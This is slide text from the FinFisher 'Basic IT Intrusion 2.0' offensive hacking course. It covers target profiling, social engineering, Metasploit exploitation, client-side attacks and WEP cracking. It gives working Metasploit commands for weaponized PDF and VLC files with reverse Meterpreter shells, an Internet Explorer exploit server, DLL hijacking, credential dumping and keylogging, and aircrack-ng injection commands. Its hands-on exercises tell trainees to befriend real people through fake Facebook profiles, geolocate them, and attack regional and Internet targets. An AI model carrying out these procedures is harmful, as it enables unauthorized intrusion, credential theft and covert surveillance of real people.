Web Application | Manualzz

1
FINFISHER: Basic IT Intrusion 2.0
FinTraining Program
Purpose of this course
2
•
Get an overview of existing up-to-date Tools and Techniques for different scenarios
•
Understand the terms and processes of “hacking”
•
Understand common attack methods
Out of Scope
•
You won’t get a magic-potion to break into environments
•
You won’t learn how to use automated security scanners
•
•
but you will understand their functionality
You won't become an expert on the presented techniques
3
Requirenments
•
PC/Notebook running BackTrack 5
•
Basic TCP/IP networking knowledge
•
Basic Windows and UNIX/Linux knowledge
•
Creativity, Intelligence and Motivation(!)
4
Table of Content – Complete Overview
5
1.
Overview
2.
Footprinting
3.
Server Intrusion
4.
Client-Side Intrusion
5.
Wireless Intrusion
6.
Wired Intrusion
7.
Web Application
8.
Miscellaneous Attacks
Table of Content
6
•
Overview
•
•
•
History
Scene
Recent Cases
History
1971
Cap‘n Crunch aka. John Draper
Pioneer of Phone Phreaking / Hacking
Whistle out of cereal box emulates 2600Hz (AT&T phone system)
Free Phone calls
7
History
1983
Movie „War Games“ released
Introduces „Hacking“ to the public
Showing that everyone could possibly break in everywhere
8
History
1984
Hacker `Zine „2600“
Followed by „Phrack“ one year later – http://www.phrack.org
Regularly publishes content for hacker and phreaker
9
History
1988
The Morris Worm
Robert T. Morris, Jr – Son of a NSA scientist
Self-replicating worm in the ARPAnet
6000 UNIX computers of universities and government were infected
10
History
1995
Kevin Mitnick arrested - Master of Social Engineering
Hacked into several computer systems (IBM, Nokia, Motorola, Sun, …)
Not allowed to touch computers and phones for years
Wrote two books after release in 1999
•
The Art Of Deception
•
The Art Of Intrusion
11
History
1998
Cult of the Dead Cow releases „Back Orifice“
First famous Trojan Horse for Windows System
Full remote system access
12
History
2000
Distributed Denial of Service Attacks
Takes down eBay, Amazon, CNN, Yahoo! and others for hours
http://news.cnet.com/2100-1017-236683.html
13
History
2006
Release of BackTrack
Co-founder is founder of Gamma International GmbH
Hacking for the public
Compilation of most hacking tools in one Linux system
Around 5 Million downloads per release
14
History
15
2010
WikiLeaks is publicly and internationally recognized
International non-profit organization that publishes submissions of private, secret and
classified media
Sent in by anonymous news sources, news leaks and whistleblowers
Table of Content
16
•
Overview
•
•
•
History
Scene
Recent Cases
Scene – Classification
•
Script-Kiddie:
•
•
White-Hat:
•
•
Professional researchers, Often former Black-Hats
Grey-Hat:
•
•
Beginner, using tools public in the Internet, often malicious, defaces Websites
Professional researcher, No criminal intent, Improving network and system security
Black-Hat:
•
Professional cyber criminal
17
Scene – Communication
•
•
•
Private, encrypted communication
•
Skype
•
Pidgin/Jabber + SSL/TLS
•
Mail (GPG/PGP)
•
Secure IRC / SILC
Public communication
•
Web-Forums
•
Mailing-Lists (Bugtraq)
•
Blogs
•
Twitter
Conferences
18
Scene – Conferences
19
DEF CON
•
DEF CON, in Las Vegas, is the biggest hacker convention in the United States held during summer (JuneAugust).
Black Hat
•
Black Hat is a series of conferences held annually in different cities around the world.
Scene – Conferences
20
Hack in the Box
•
Asia's largest network security conference held annually in Kuala Lumpur, Malaysia which is now also
organized in Middle East.
Chaos Communication Congress
•
It is the oldest- and Europe's largest hacker conference, held by the Chaos Computer Club in Berlin.
Table of Content
21
•
Overview
•
•
•
History
Scene
Recent Cases
Recent Cases
China hacking German Government
22
Recent Cases
Researcher purposefully publishes 100 Government and Embassy E-Mail Accounts
23
Recent Cases
Website Defacements
24
Recent Cases
Website Defacements
25
Recent Cases
26
Website Defacements
April 2011
Source:
•
http://www.zone-h.org/stats/ymd
•
http://www.zone-h.org/news/id/4737 (Detailed Statistics for 2010)
Recent Cases
27
Recent Cases
28
Table of Content – Complete Overview
29
1.
Overview
2.
Footprinting
3.
Server Intrusion
4.
Client-Side Intrusion
5.
Wireless Intrusion
6.
Wired Intrusion
7.
Web Application
8.
Miscellaneous Attacks
Table of Content
30
•
Footprinting
•
•
•
•
Information Gathering
Social Engineering
Social Networks
Geolocation
Information Gathering
•
Target profiling
•
Allows to construct an attack strategy
•
Passive information collection without directly accessing the target
•
Professional research
31
Information Gathering – Search Engines
•
Google
•
No explanation needed. 
32
Information Gathering – Search Engines
•
www.netcraft.com - List of web servers and software
•
Including History of changes
33
Information Gathering – Search Engines
•
www.archive.org - Different snapshot copies of websites
•
Discover progress of the website
•
Old services and test systems are often still running
•
Retired / Fired company employees
34
Information Gathering – Search Engines
•
www.zone-h.org - Digital Attacks Archive
•
Information of documented / public attacks
•
Get connected with former, successful hackers
35
Information Gathering – Whois Records
•
www.domaintools.com – Domain Archive
•
Looks up historical ownership of a website
•
Gives registrar information for a domain + screenshot
36
Information Gathering – Maltego
•
Maltego
•
Data mining and information gathering tool
•
Identify key relationships between information and find unknown relationships
•
Gives an easy overview about the results
37
Information Gathering – Hands-On
Hands-On:
38
Information Gathering – Hands-On
Hands-On:
•
Choose any local target
•
Check target on all Search Engines
•
Register Account at Maltego
•
Use Maltego to gather information about the local target
•
E-Mails
•
Persons
39
Table of Content
40
•
Footprinting
•
•
•
•
Information Gathering
Social Engineering
Social Networks
Geolocation
Social Engineering
41
Social engineering uses influence and persuasion to deceive people by convincing them that
the social engineer is someone he is not, or by manipulation.
(Kevin D. Mitnick)
•
Non-technical kind of intrusion that relies heavily on human interaction
•
Often involves tricking other people to break normal security procedures
•
Peoples inability to keep up with a culture that relies heavily on information technology
Social Engineering
Example 1:
42
Social Engineering
Example 2:
43
Social Engineering
Example 3:
44
Social Engineering
Example 4:
http://thenextweb.com/insider/2011/06/28/us-govt-plant-usb-sticks-in-security-study-60-of-subjects-take-the-bait/
45
Table of Content
46
•
Footprinting
•
•
•
•
Information Gathering
Social Engineering
Social Networks
Geolocation
Social Networks
•
Lots of different online communities
•
Used for business and private life
•
Messages on them are more and more alternative to E-Mails
•
Information:
•
Personal Facts
•
Friends (and friends of friends)
•
Interests
•
Activities
•
Photos
•
Hundred of millions people around the globe use them
•
Popular community differ between countries
47
Social Networks
•
•
•
Facebook
•
Social Network for everybody
•
750 Million active users (July 2011)
Twitter
•
Microblogging network
•
200 Million active users (March 2011)
LinkedIn
•
Business-orientated network
•
100 Million registered users (March 2011)
48
Social Networks – Hands-On
Hands-On:
49
Social Networks – Hands-On
Hands-On:
•
Profiling a human target with previous methods
•
Creating a fake account on Facebook
•
Fill in a lot of realistic information (Picture, Interests, Groups, …)
•
Choose the regional, human target
•
Try to add your target to your friends and many friends around your target
•
Gather personal information about the target
50
Table of Content
51
•
Footprinting
•
•
•
•
Information Gathering
Social Engineering
Social Networks
Geolocation
Geolocation
•
•
•
Geotagged Photos
•
Most smartphones (e.g. iPhone & Android Devices) have in-built GPS and save location to photos
•
People upload pictures to Social Networks
Geolocation Services
•
People show their location on Social Networks to their friends
•
Foursquare
•
Twitter
•
Facebook
Location saved on Smartphones & Tablets
•
iPad / iPhone
•
Android
52
Geolocation
Geotagged Photos
•
GPS coordinates are within images and can be extracted!
•
Tool called exiftool can be used to extract Metadata from images
•
Example
exiftool -c "%d %d %.8f" ~/image.jpg
•
To get a proper GPS coordinates format
-c "%d %d %.8f“
53
Geolocation
Geotagged Photos
•
Example Facebook Photo
54
Geolocation
Geotagged Photos
•
“GPS Position” field can be pasted to Google Maps for Location
•
Example Facebook Photo → Google Maps
55
Geolocation – Hands-On
Hands-On:
56
Geolocation – Hands-On
Hands-On:
•
Choose Facebook friends and analyze a few images
•
Geolocation shown within pictures?
•
Geolocation found on Google Maps?
57
Geolocation
Geolocation services
•
Many Websites offer to “upload” your location
•
Used for “Friend finding”
•
Used on Social Networks
•
Twitter
•
Facebook
58
Geolocation
Geolocation services
•
Most famous and very popular – Foursquare
•
http://www.foursquare.com
•
Connect with friends and share your location
•
Can send these information directly to Twitter/Facebook account of a person
•
Applications for iPhone, iPad, Android, etc.
59
Geolocation
Geolocation services
•
Example: Foursquare & Facebook
•
Example: Foursquare & Twitter
60
Geolocation
Geolocation services
•
Extraction can be automated
•
Tool called creepy can be used
•
•
•
http://ilektrojohn.github.com/creepy/
•
A Geolocation Information Aggregator
Can automatically search through
•
Foursquare
•
Twitter
•
Flickr
•
and many more
Facebook support is planned!
61
Geolocation
Geolocation services
•
Example Twitter Extraction
•
Location moving profile through timeline
•
Hotspots
62
Geolocation – Hands-On
Hands-On:
63
Geolocation – Hands-On
Hands-On:
•
Download & Install creepy
•
aptitude install creepy
•
Get familiar with the GUI
•
Choose local Twitter Accounts
•
Run creepy against several Targets (Can take a while)
•
Geolocation shown within Twitter Account?
•
Does the Target has main spots?
64
Geolocation
Location saved on Smartphones
•
Many Smartphones save GPS / GSM information their Smartphones
•
Android has cache.cell & cache.wifi
•
•
Extraction with android-locdump (root access required)
•
https://github.com/packetlss/android-locdump
“LocationGate” – iPhone / iPad have consolidated.db
•
Backup of this file is saved on computer via iTunes
•
Extraction with iPhoneTracker
•
http://petewarden.github.com/iPhoneTracker/
65
Geolocation
Location saved on Smartphones
•
iPad / iPhone Example
66
Table of Content – Complete Overview
67
1.
Overview
2.
Footprinting
3.
Server Intrusion
4.
Client-Side Intrusion
5.
Wireless Intrusion
6.
Wired Intrusion
7.
Web Application
8.
Miscellaneous Attacks
Table of Content
68
•
Server Intrusion
•
•
•
•
Linux Basics
Scanning
Enumeration
Exploit Usage
Linux Basics
•
Initial Kernel release in 1991 by Linus Torvalds
•
Today market share
•
•
•
Server: 30% - 40%
•
Desktops: 2% - 5%
Famous Linux Distributions:
•
Server: Debian
•
Desktop: Ubuntu & Fedora
Almost full hardware support these days
69
Linux Basics
•
70
Linux Directory Structure (the most important directories)
/
Top-Level Directory
/boot
Startup files and Kernel
/etc
System and Software configuration files
/home
User directories
/mnt
Mount point for external devices
/root
Home directory of root user
/tmp
Temporary files / cleaned upon reboot
/var
Storage for all variable files and temporary files (e.g. logs)
/pentest
BackTrack / FinTrack added software
Linux Basics
•
Super User Rights
•
•
Changing Directories
•
•
gedit /etc/passwd
Show latest Entries (of Logfile)
•
•
mv oldfile.txt newfile.txt
Edit & Read (Configuration File) with Graphical Text Editor
•
•
cd /pentest/
Rename & Move File
•
•
sudo command
tail –f /var/log/messages
Show Network Configuration
•
ifconfig
71
Linux Basics
•
Remove Files
•
•
Remove Directories
•
•
cp file.cfg_template file.cfg
Show content of file
•
•
rm –r directoryname
Copy File
•
•
rm filename
cat /etc/passwd
Create an empty file
•
touch myfile
72
Linux Basics
73
Advanced Shell Usage
command1 > outputfile
Redirect output of command1 to file
e.g.:
command1 | command2
Pipe Output of command1 to command2
e.g.:
command1 && command2
ls /etc/ > /root/Desktop/etclist.txt
echo test | md5sum
Start command2 after command1 is finished
e.g.:
./configure && make
Linux Basics
Hands-On:
74
Linux Basics
Hands-On:
•
Create a file in your Home directory
•
Fill the file with any content
•
Copy the file to /tmp
•
Change to directory /tmp
•
Remove the file in /tmp
•
Pipe the input of the file in your Home directory into a file on the Desktop
•
Remove both files with only one line in the command shell
75
Table of Content
76
•
Server Intrusion
•
•
•
•
Linux Basics
Scanning
Enumeration
Exploit Usage
Scanning
What is network scanning?
•
Host Discovery
•
Port Scanning
•
Version Detection
•
OS Detection
•
Generate a detailed network plan
77
Scanning
Nmap (Network MAPper)
•
Initial Release was 1997
•
Most famous network scanner in the world
•
Was extended using it’s own scripting language
•
Very accurate Operating System and Service Detection
•
Runs on multiple systems (Windows, Linux, MacOS, UNIX, *BSD, …)
78
Scanning
Graphical Frontend – Zenmap
•
With Profile Editor
79
Scanning
Important Commands
•
-sV
Performing a version detection on open ports
•
-O
Performing Operating system detection (needs root privileges)
•
-sC
Uses internal scripts for enumeration
•
-Pn
Ignores if ICMP replies are not sent (so hosts will be scanned even if “offline”)
80
Scanning
Example output for www.microsoft.com
81
Scanning
Example output for Test Windows XP
82
Scanning
Results?
•
What kind of information did we get for each target?
•
Which services are running?
•
Which open ports are running?
83
Scanning
Hands-On:
84
Scanning
Hands-On:
•
Start Zenmap
•
Scan Target within LAN
•
Play with the Options from the Profile Wizard
•
How do the results differ?
•
Choose regional target
•
Any interesting information?
85
Table of Content
86
•
Server Intrusion
•
•
•
•
Linux Basics
Scanning
Enumeration
Exploit Usage
Enumeration
Enumeration can retrieve:
•
Anonymous Access
•
Default Credentials
•
Default Access Rights
•
User names
•
Shares
•
Services of networked computers
87
Enumeration
Using Enumeration on our LAN target
•
Target has Network shares
•
How to get information about them?
• Zenmap can be used!
• Zenmap has integrated scripts for Enumeration in
•
•
./scripts/smb-enum*.nse
Command example:
•
nmap -p U:137,T:139 --script smb-enum-* 192.168.1.106
88
Enumeration
Zenmap Output:
89
Enumeration
Successful Enumeration on our LAN target
•
Network Shares are known
•
Access needed!
•
SMB4K
•
Scanning for (active) workgroups, hosts, and shares
•
Mount and Unmount of remote shares, including unmounting all shares at once
•
Access to the files of a mounted share using a file manager or terminal
•
Default login
90
Enumeration
SMB4K Main Interface – Mount Dialog
•
Share = //HOST/SHARE (see Zenmap results)
91
Enumeration
After Mounting the share can be accessed
•
Maybe no write but read rights given
92
Enumeration
Hands-On:
93
Enumeration
Hands-On:
•
Start Zenmap
•
Choose target within LAN
•
Enumerate shares
•
Install SMB4K
•
aptitude install smb4k
•
Start SMB4K
•
Try mounting all enumerated shares
•
Which user-rights are given? Read? Write? Read & Write?
94
Table of Content
95
•
Server Intrusion
•
•
•
•
Linux Basics
Scanning
Enumeration
Exploit Usage
Exploit Usage
What is an Exploit?
•
Piece of software
•
Takes advantage of a software bug or software vulnerability
•
Extend user rights
•
To get access to a remote system
•
For different Applications, Platforms and Services
•
Public Exploits
•
Private Exploits (Zero Day / 0-day)
96
Exploit Usage
• Zenmap can be used for SMB Vulnerability Scanning
• Zenmap has integrated scripts for SMB Vulnerability Scanning in
•
•
./scripts/smb-check-vulns.nse
Command example:
•
nmap -p U:137,T:139 --script smb-check-vulns 192.168.1.106
97
Exploit Usage
• Zenmap found SMB Vulnerability!
•
Microsoft Security Bulletin: MS08-067
•
http://www.microsoft.com/technet/security/bulletin/ms08-067.mspx
98
Exploit Usage
Hands-On:
99
Exploit Usage
Hands-On:
•
Start Zenmap
•
Choose target within LAN
•
Use SMB Vulnerability Scanning with Target
•
Repeat the same with Internet Target where SMB is enabled
100
Exploit Usage
101
Where to find:
•
•
•
Different Websites
•
SecurityFocus
http://www.securityfocus.com/
•
Packet Storm
http://www.packetstormsecurity.org/
•
Exploit Database
http://www.exploit-db.com/
Integrated in automated scanners
•
Nessus
•
Core Impact (commercial)
http://www.nessus.org/
Integrated in Exploit Frameworks
•
Metasploit
http://www.metasploit.com/
Exploit Usage
Metasploit:
•
Exploit Database
•
Payload Database
•
Auxiliary Database
•
Powerful Post-Exploitation modules
•
Powerful GUI via Armitage
102
Exploit Usage
Metasploit:
•
Updating Database (can take a while)
•
cd /pentest/exploits/framework3/ && ./msfupdate
103
Exploit Usage
Metasploit – Starting Armitage
1. Type armitage inside a terminal
2. Select “Start MSF”
104
Exploit Usage
Armitage – The GUI
105
Exploit Usage
Hands-On:
106
Exploit Usage
Hands-On:
•
Start Armitage
•
Get familiar with the GUI
•
Get familiar with the difference of
•
Exploits
•
Auxiliaries
•
Payloads
•
Post Exploitation
107
Exploit Usage
Metasploit – Searching for our Vulnerability
1. Search Bar – Type in keyword
2. Results
108
Exploit Usage
Metasploit – Description & Required Options
1.
Description
2.
(Required) Options
3.
Connection Type
109
Exploit Usage
110
Metasploit – Required Options
•
RHOST = Defining Remote Host
•
RPORT = Defining Remote Port
•
LHOST = Local Host (Reverse Connect needs to know where to connect to)
•
LPORT = Local Port (Reverse Connect also needs to know which port to connect to)
•
… and further default options
Exploit Usage
Metasploit – Launching Exploit
1.
Target System will be shown (including Operating System, IP address, Hostname and system account)
2.
Session opened (Meterpreter – will go into this later)
111
Exploit Usage
Metasploit – System Access
1.
Change Directory to Desktop
2.
Create File on Desktop
112
Exploit Usage
Metasploit –Target System – Desktop
113
Exploit Usage
Hands-On:
114
Exploit Usage
Hands-On:
•
Start Metasploit – Armitage
•
Search for Exploit
•
Choose Network Target
•
Exploit SMB Service
•
Create file on Desktop
115
Table of Content – Complete Overview
116
1.
Overview
2.
Footprinting
3.
Server Intrusion
4.
Client-Side Intrusion
5.
Wireless Intrusion
6.
Wired Intrusion
7.
Web Application
8.
Miscellaneous Attacks
Table of Content
117
•
Client-Side Intrusion
•
•
•
•
•
Overview
PDF File
Video File
Browser
DLL Hijacking
Client-Side Intrusion – Overview
•
Take advantage of vulnerabilities in client software such as:
•
PDF Reader (e.g. Acrobat Reader, FoxIT PDF Reader)
•
Media Player (e.g. VLC)
•
Web-Browser (e.g. Internet Explorer, Firefox, etc.)
•
Exploit vulnerabilities in system-wide libraries used by client applications
•
Often limited in time as application vendors fix bugs normally quite
•
Software often has integrated auto-updates
118
Table of Content
119
•
Client-Side Intrusion
•
•
•
•
•
Overview
PDF File
Video File
Browser
DLL Hijacking
Client-Side Intrusion – PDF File
•
Adobe Acrobat Bundled LibTIFF Integer Overflow
•
Working on 8.0 through 8.2
•
Working on 9.0 through 9.3
•
Working on ALL platforms
•
Full administrative rights
•
Found in February 2010 – took almost 6 months to fix
•
References:
•
http://www.adobe.com/support/security/bulletins/apsb10-07.html
•
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-0188
120
Exploit Usage
Metasploit:
•
Starting the Metasploit Framework from the Console
•
./msfconsole
121
Client-Side Intrusion – PDF File
•
Metasploit – Choose Client Side Exploit
122
Client-Side Intrusion – PDF File
•
Choosing Exploit:
•
•
Show info & description of exploit
•
•
info
Set payload
•
•
use exploits/windows/fileformat/adobe_libtiff
set payload windows/messagebox
Show required and optional options
•
show options
123
Client-Side Intrusion – PDF File
Metasploit – Choosing Payload
•
What is a Payload / Shellcode?
•
Which kinds of payloads does Metasploit offer
•
TCP Connect / TCP Reverse Connect
•
Open a Remote Shell
•
Open Meterpreter Shell
•
Start VNC on Target
•
Lots more…
124
Client-Side Intrusion – PDF File
Metasploit – Options
•
Module options
•
Payload options
125
Client-Side Intrusion – PDF File
•
Creating the File
•
exploit
126
Client-Side Intrusion – PDF File
Hands-On:
127
Client-Side Intrusion – PDF File
Hands-On:
•
Start Metasploit Console
•
Get familiar with the Console
•
Recreate the PDF Exploit
128
Client-Side Intrusion – PDF File
•
We have the Exploit
•
Missing?
Distribution of the PDF Exploit
•
E-Mail
•
USB
•
Website Upload
•
….
129
Client-Side Intrusion – PDF File
Target has Adobe 9.3.0 installed
130
Client-Side Intrusion – PDF File
Target checks Exploit PDF – it’s a regular PDF file!
131
Client-Side Intrusion – PDF File
Target executes the Exploit PDF
•
MessageBox appears with our predefined text
•
This MessageBox could be a trojan!
132
Client-Side Intrusion – PDF File
Hands-On:
133
Client-Side Intrusion – PDF File
Hands-On:
•
Distribute the Exploit PDF
•
Wait for execution
•
Did the Exploit work?
134
Table of Content
135
•
Client-Side Intrusion
•
•
•
•
•
Overview
PDF File
Video File
Browser
DLL Hijacking
Client-Side Intrusion – Video File
•
VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow
•
Working on ALL VLC <= 1.1.8
•
Working on ALL Windows
•
Full administrative rights
•
Found in April 2011
•
Remote Code Execution
•
References:
•
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2011-1574
•
https://www.sec-consult.com/files/20110407-0_libmodplug_stackoverflow.txt
136
Client-Side Intrusion – Video File
Setting Options
•
Exploit:
use exploit/windows/fileformat/vlc_modplug_s3m
•
Payload:
set payload windows/meterpreter/reverse_tcp
•
Meterpreter?
137
Client-Side Intrusion – Video File
Meterpreter
•
Advanced Shell with additional features
•
Escalate system privileges
•
Process Migration
•
Post Exploitation Modules
•
Keylogging
•
File System Access
•
Etc…
138
Client-Side Intrusion – Video File
•
Setting Options
139
Client-Side Intrusion – Video File
•
Creating the Exploit
•
Options:
set FILENAME evil.mkv
set OUTPUTPATH /root/
set LHOST 192.168.1.103
140
Client-Side Intrusion – Video File
Hands-On:
141
Client-Side Intrusion – Video File
Hands-On:
•
Start Metasploit Console
•
Get familiar with the Console
•
Recreate the Video Exploit
142
Client-Side Intrusion – Video File
•
We have the Exploit Video File
•
Missing?
•
Missing listening connection
•
How do we distribute the Exploit Video File?
•
How do we know the Exploit Video was executed?
143
Client-Side Intrusion – Video File
144
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.101 E
Powerful command line interface for the Metasploit Framework
./msfcli
The selected module
exploit/multi/handler
The payload being used
PAYLOAD=windows/meterpreter/reverse_tcp
Defining the local host
LHOST=192.168.1.101
Execution of the module
E
Client-Side Intrusion – Video File
•
We create a shell which listens on the local host for a connection
•
With windows/meterpreter/reverse_tcp now
145
Client-Side Intrusion – Video File
Now we need to distribute the Video Exploit to the Target
•
E-Mail
•
USB
•
Website Upload
•
….
146
Client-Side Intrusion – Video File
•
Target has VLC 1.1.6 installed
147
Client-Side Intrusion – Video File
Target checks Exploit Video File – it’s a regular video file!
148
Client-Side Intrusion – Video File
Target executed Exploit Video File – Meterpreter Shell!
149
Client-Side Intrusion – Video File
Explanation:
sysinfo
Give further information about the remote system
use priv
Using a Meterpreter extension for escalating privilege commands
hashdump
Dumping user-credentials on the remote-system
150
Client-Side Intrusion – Video File
Hands-On:
151
Client-Side Intrusion – Video File
Hands-On:
•
Get Meterpreter Shell on Target System
•
Play with Meterpreter Shell
•
help will give a list of available commands
•
Record keystrokes
•
Do a screenshot
152
Table of Content
153
•
Client-Side Intrusion
•
•
•
•
•
Overview
PDF File
Video File
Browser
DLL Hijacking
Client-Side Intrusion – Browser
•
Internet Explorer CSS Recursive Import Use After Free
•
Memory Corruption Vulnerability / Bypass of DEP and ASLR
•
Affected:
•
•
Internet Explorer 6, 7, 8
•
Windows XP, Windows Vista, Windows 7
“When A DoS Isn't A DoS”
•
http://www.breakingpointsystems.com/community/blog/ie-vulnerability/
•
Published in December 2010 / Microsoft Released Patch in March 2011
•
References:
•
http://www.microsoft.com/technet/security/bulletin/MS11-003.mspx
•
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-3971
154
Client-Side Intrusion – Browser
•
Different from the previous attacks
•
No need to distribute a file to the victim
•
Target needs to visit a Website
•
Attacker creates website/webserver
155
Client-Side Intrusion – Browser
•
use exploit/windows/browser/ms11_003_ie_css_import
156
Client-Side Intrusion – Browser
•
Different options
•
SRVHOST (local IP address or public internet IP address)
•
SRVPORT (local Port to listen on – preferred “80”)
•
URIPATH (exact URI of the “website”)
157
Client-Side Intrusion – Browser
•
Set payload (meterpreter) with options!
•
Exploit
•
Webserver was created and waiting for connection
158
Client-Side Intrusion – Browser
•
Target visits the website with Internet Explorer 8
•
Session is created
159
Client-Side Intrusion – Browser
•
160
Automatic Process Migration
[*] Session ID 1 (192.168.1.103:4444 -> 192.168.1.111:1050) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2032)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 2276
[*] New server process: notepad.exe (2276)
•
This is necessary if Target closes the Internet Explorer – our Session would be gone
•
Migration into another process let our session be active until reboot
Client-Side Intrusion – Browser
•
List active sessions (including the exploit name)
•
•
sessions –l –v
Interact with session
•
session –i 1
161
Client-Side Intrusion – Browser
Hands-On:
162
Client-Side Intrusion – Browser
Hands-On:
•
Replay the Internet Explorer Exploit
•
Get Meterpreter Shell on Target System
•
Play with Meterpreter Shell
•
help will give a list of available commands
•
Download some files from the target
•
Upload an *.exe file to the target
•
Execute the file on the target
163
Table of Content
164
•
Client-Side Intrusion
•
•
•
•
•
Overview
PDF File
Video File
Browser
DLL Hijacking
Client-Side Intrusion – DLL Hijacking
•
Application DLL Hijacking
•
Windows loads an additional DLL if an application is executed
•
No real fix via Windows Update – Workaround can be downloaded!
•
Affected:
•
All Windows
•
Published in late August 2010
•
References:
•
http://support.microsoft.com/kb/2264107
•
http://blog.zoller.lu/2010/08/cve-2010-xn-loadlibrarygetprocaddress.html
165
Client-Side Intrusion – DLL Hijacking
•
use exploit/windows/browser/webdav_dll_hijacker
166
Client-Side Intrusion – DLL Hijacking
•
Different options
•
EXTENSION (extensions for generation into destination folder e.g. ppt)
•
SRVHOST
(IP the server is started on)
•
LHOST
(IP to listen on for reverse connection)
167
Client-Side Intrusion – DLL Hijacking
•
Exploit
•
Web server was created and waiting for connection
168
Client-Side Intrusion – DLL Hijacking
1. Targets visits URL
2. Network share automatically opens
3. Target opens file within the share!
169
Client-Side Intrusion – DLL Hijacking
•
“Malicious” DLL is loaded and executed
•
Shell is established
170
Table of Content – Complete Overview
171
1.
Overview
2.
Footprinting
3.
Server Intrusion
4.
Client-Side Intrusion
5.
Wireless Intrusion
6.
Wired Intrusion
7.
Web Application
8.
Miscellaneous Attacks
Table of Content
172
•
Wireless Intrusion
•
•
•
•
Wireless Basics
Breaking WEP
Breaking WPA
Credential Sniffing
Wireless Intrusion – Wireless Basics
•
IEEE Standard – 802.11
•
Frequency: 2.4 GHz
•
802.11a
•
•
•
Up to 54 Mbps
•
Good Speed / less range
802.11b
•
Up to 11 Mbps
•
Less Speed / good range
802.11g
•
Up to 54 Mbps
•
Good speed / good range
173
Wireless Intrusion – Wireless Basics
•
IEEE Standard – 802.11
•
802.11n
•
•
150-300 Mbps
802.11n
•
2.4 GHz – Less fast / better range
•
5 GHz – Much faster / less range
174
Wireless Intrusion – Wireless Basics
Frequencies
•
•
2.4 GHz
•
Pro: Widely spread
•
Con: Sharing of different devices (Microwaves, Bluetooth, …)
5 GHz
•
Pro: less used frequency, longer range
•
Con: Viewer devices -> more cost intensive
Channels
•
2.4 GHz – Usually 1 – 13 (frequency varies a bit in each channel)
•
5 GHz – Maximum of 43 but depending on the region (Europe, America, Asia, etc.)
http://en.wikipedia.org/wiki/List_of_WLAN_channels
175
Wireless Intrusion – Wireless Basics
Encryptions – WEP
•
WEP = Wired Equivalent Privacy
•
IEEE 802.11
•
Based on a secret Key
•
The key is used to initialize an RC4 stream
•
Packets payload is encrypted
•
Different security flaws
176
Wireless Intrusion – Wireless Basics
Encryptions – WPA
•
WPA = Wi-Fi Protected Access
•
WEP replacement due to the security flaws
•
Still RC4 but longer initialization vector
•
Introduction of TKIP protocol changes key every few minutes
•
TKIP (Temporal Key Integrity Protocol encryption) encrypts the wireless signal
•
Authentication against the network itself – not only a particular access point
177
Wireless Intrusion – Wireless Basics
Encryptions – WPA2
•
IEEE 802.11i
•
Dedicated hardware chip to handle the encryption
•
New AES-based encryption mode with strong security
•
WPA2-Personal (WPA2-PSK)
•
•
Uses a pre-shared key
WPA2-Enterprise (WPA2-RADIUS)
•
Authenticates users against a centralized authentication service
178
Wireless Intrusion – Wireless Basics
179
Frame Types
•
Control frames
•
•
Controlling the radio transmission, retransmission etc
Management frames
•
Handling all the “managing tasks”
•
Important packets:
• Association Request, Association Response, Re-association Request, Re-association Response, Probe
Request, Probe Response, Beacon, Disassociation, Authentication, De-authentication
•
Data frames
•
Transporting the data of the radio network
Wireless Intrusion – Wireless Basics
180
Important Facts
•
Control frames & Management frames are unencrypted:
•
•
•
802.11 defines no protection mechanism against injection, replay, etc.
Open authentication is more secure than shared authentication
•
Attacker sees plain-text challenge and encrypted response
•
Known plain-text/cipher-text allows to recover keystream (PRGA)
Cloaked/Hidden Networks with SSID disabled transfer it’s SSID in other management
frames like probe requests, etc.
•
•
De-authenticating a client will help revealing the wireless SSID
A radio network is always vulnerable to denial of service attacks on the radio layer
Table of Content
181
•
Wireless Intrusion
•
•
•
•
Wireless Basics
Breaking WEP
Breaking WPA
Credential Sniffing
Wireless Intrusion – Breaking WEP
•
Finding Wireless Networks
• kismet can be used!
•
•
Wireless Network Detector
•
Wireless Packet Sniffer
All network information provided
•
SSID (Network Name)
•
BSSID (MAC of Router)
•
Encryption
•
Signal Strength
•
Connected Clients
•
Number of Packets
182
Wireless Intrusion – Breaking WEP
Hands-On:
183
Wireless Intrusion – Breaking WEP
Hands-On:
•
Start kismet
•
Choose available WEP encrypted network(s)
•
What we need to note down:
•
Channel
•
BSSID
•
(E)SSID
•
Own MAC
•
Possible connected Clients (press "c" in kismet)
184
Wireless Intrusion – Breaking WEP
•
Attacking Wireless Networks
•
aircrack-ng suite can be
•
Can crack WEP & WPA keys
•
Packet injector
•
Packet Sniffer
used
185
Wireless Intrusion – Breaking WEP
•
Wireless card into monitor mode to sniff packets
•
•
airmon-ng start <INTERFACE> <CHANNEL>
Logging the traffic
•
•
186
airodump-ng -c <CHANNEL> --bssid <BSSID> -w outputfile <INTERFACE>
We need around 20,000 to 30,000 packets
Wireless Intrusion – Breaking WEP
•
Not many or no packets might occur in the “Data” field
•
We need to increase traffic
•
We can inject own traffic with different techniques
•
ARP Replay
•
Fragmentation Attack
•
Chop Chop
•
Etc.
187
Wireless Intrusion – Breaking WEP
•
•
Using ARPreplay attack
•
ARP Replay Attack
•
Requires active clients
•
Listen for a Client packet
•
Use this packet to flood the AP
•
Success depends on the selected packet
•
No way to tell which is the “magic” packet
aireplay-ng --interactive -b <BSSID> -h <MY_MAC> <INTERFACE>
188
Wireless Intrusion – Breaking WEP
•
Sometimes aireplay-ng does not capture usable packets because the clients are not
generating any traffic
•
It's easy to enforce client communication by sending de-authentication frames
•
Deauthentication attack
•
189
•
To discover the SSID of a network that does not broadcast it
•
To capture handshake packets for WPA or WPA2
•
To generate ARP-requests
aireplay-ng –-deauth=5 -a <BSSID> -c <CLIENT_MAC> <INTERFACE>
Wireless Intrusion – Breaking WEP
•
•
Fragmentation attack
•
Does not require clients
•
Needs to be close to Access-Point
Fake Authentication:
•
•
aireplay-ng –-fakeauth=0 -e <ESSID> -a <BSSID> -h <MY_MAC> <INTERFACE>
Waiting for packet for injection:
•
•
190
aireplay-ng --fragment -F -b <BSSID> -h <MY_MAC> <INTERFACE>
Compile packet:
•
packetforge-ng --arp -a <BSSID> -h <MY_MAC> -k 255.255.255.255 –l
